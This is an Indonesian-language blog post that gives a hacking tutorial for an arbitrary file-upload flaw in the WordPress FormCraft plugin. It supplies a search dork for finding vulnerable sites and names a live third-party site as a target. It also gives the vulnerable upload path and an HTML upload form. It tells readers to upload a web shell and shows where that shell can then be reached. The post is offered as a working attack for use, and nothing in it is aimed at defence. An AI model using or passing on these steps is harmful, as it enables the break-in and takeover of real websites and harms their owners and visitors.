Assalamualaikum ..
Maaf kalau acak-acakan soalnya ini post pertama saya wkakwakwka
Langsung aja yah kakak
Dork : inurl:"wp-content//plugins/formcraft/"
Live Target : http://quiropracticoqro.com/
Exploit :
Code:
1. wp-content/plugins/formcraft/file-upload/server/php/upload.php
2. wp-content/plugins/formcraft/file-upload/server/php/
Script CSRF :
Code:
<form method="POST" action="http://www.Unknown~X.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
*Save As .html
Cari target menggunakan dork di atas
Jika Vuln akan nampak seperti ini
Contoh Vuln :
![[Image: image.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u3_6Z9rd86JXBCJl7ocqGXRWw4eR6JwD3J_XZnoEfr8uNZOw1mvSw8-l1CzFzCMs8S37O3TmvJgjhhlmbUzyp5P2XAtmDGNorjNVrPUA=s0-d)
Sekarang tinggal edit targetnya di Script CSRF yang tadi ..
Sekarang buka filenya dengan browser yang mastah gunakan
Lalu upload deh shell kesangannya
Setelah upload maka akan nampak seperti ini
![[Image: Screenshot_1.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tZEDiweaIonEvcnh7EYnu-u4LIqVYe-Go3nrWXmnu6goXMMxXNTpi1nofx4JIgIJCSRljgJCTJ2XZgAtu86Z5mY2m0SnHLtGe_NNRsmnYgpk9mdA=s0-d)
Jika Berhasil Akan Muncul Shell Kesayangan Sobat
Shell Access :
http://localhost/wp-content/plugins/formcraft/file-upload/server/php/files/namashell.php
Sekian, Semoga bermanfaat
Wassalamualaikum
Silahkan Komentarnya !!
Ketentuan Berkomentar :
1. Berkomentarlah Dengan Baik Dan Sopan
2. Tidak Punya Akun Beri Komentar Sebagai : Anonymous
3. Dilarang Meletakkan Link Hidup Maupun Link Mati
EmoticonEmoticon